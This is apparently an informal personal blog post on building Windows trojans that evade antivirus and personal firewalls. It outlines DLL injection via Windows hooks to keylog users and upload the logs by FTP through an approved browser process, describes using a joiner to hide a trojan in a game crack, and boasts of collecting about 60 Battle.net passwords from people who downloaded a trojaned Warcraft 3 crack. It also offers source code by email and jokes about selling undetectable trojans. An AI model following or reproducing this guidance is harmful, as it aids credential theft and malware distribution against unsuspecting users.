Is it really that easy to bypass firewall and antivirus?

Someone emailed me asking this very question. The short answer is NO, unless you are good in programming and know MS VC++. Of cuz assuming u're writing a trojan for Windows.

The longer answer is YES tho. It is actually a simple affair to bypass AV. Just write unique code, don't rip off stuffs you download from the net. Once you can do that, you bypass AV, since AV detect by known signature, NOT behaviour.

How about firewall? Ok, software based firewall eg ZoneAlarm and Sygate Personal Firewall, well they block traffic based on known application, eg iexplore.exe or firefox.exe. The cruel fact is you can write a program to hijack running apps to do work for you. This is known as DLL Injection. How it works is via a combinatino of a few things, including SetWindowsHookEx, (optionally) LoadLibrary and Windows Messages. You can get running apps (your trojan) to ask other apps to load a DLL of your choosing.

Using Windows Messages is particularly good. You can intercept standard messages like alt-tab/windows focus, keypress and mouse click. Anyway in the example of bypassing firewall, you write a DLL with functions to log keypress and upload to a FTP server. Then you write a hook to make every app that is run by the user load your DLL. Eg he run notepad, it loads your DLL and log keypress. This is allowed cuz Windows allows programs to load DLL, since that's how Windows functions!

When you detect a alt-tab/window focus to eg Internet Explorer (aka iexplore.exe), you request iexplore.exe to load your DLL as normal. But this time since it's iexplore.exe, ur DLL runs an extra function, which is to FTP ur logs to your FTP server. Since Internet Explorer is most likely already approved by ur SPF or ZA as an ok-to-access-net app, the upload succeeds without user intervention or firewall blocking!

If you need source to explain more, just email me.

But wait, how to infect the person? Simple, u need another app, called a joiner. You can write your own (best) or download some but those likely detected by AV. To write a joiner u need to understand CreateFileFromResource. Once u do, it's a simple affair to package your own trojan using a nice payload like a game crack.

Trojan hacker for hire!

$300 per trojan, fully undetectable, fully stealth, per your pleasure. Email arrestmenow@fbi.com! LOL...

Yeah well, this past holiday break I've bene exploring trojans with my group. Seems the world of firewalls and antivirus is for 99% of the fools out there. The other 1%, the smart people live. And in this 1%, everything is possible, even with so called protection installed, be it firewall, antivirus or security patches.

Yes, it's entirely possible (and EASY!) to write your own trojan that keylogs, captures mouse presses, take screenshots of ur desktop, etc and then send out all this info back to me, without the victim knowing what happened. And all this under the nose of the latest firewall and antivirus.

Why? Let me break it down into the 2.


Firewall: Personal firewalls block by applications. Stronger firewalls (like server based) block by port. What if your transmission is both by an approved port (eg 80) AND an approved app (eg Internet Explorer)? Then traffic is legal. But surprise! I can hijack both these things and my trojan traffic is now legal.


Antivirus: This one even easier. AV works by detected known byte signatures of viruses. What if you wrote your own virus? Of cuz then it's not picked up by the AV! Afterall, I don't think there's a BengHacks.W32 out there...

So how to spread my trojan to steal passwords and bank account numbers? VERY EASY. How about I crack Warcraft 3 exe (very popular now with DOTA) and put it on a website for free download? ALOT of ppl will download. In a few days I had collected about 60 BNet accounts and passwords, not to mention VERY interesting info heheheh.

But of cuz I'm not stupid, go commit crime. But it proved my point.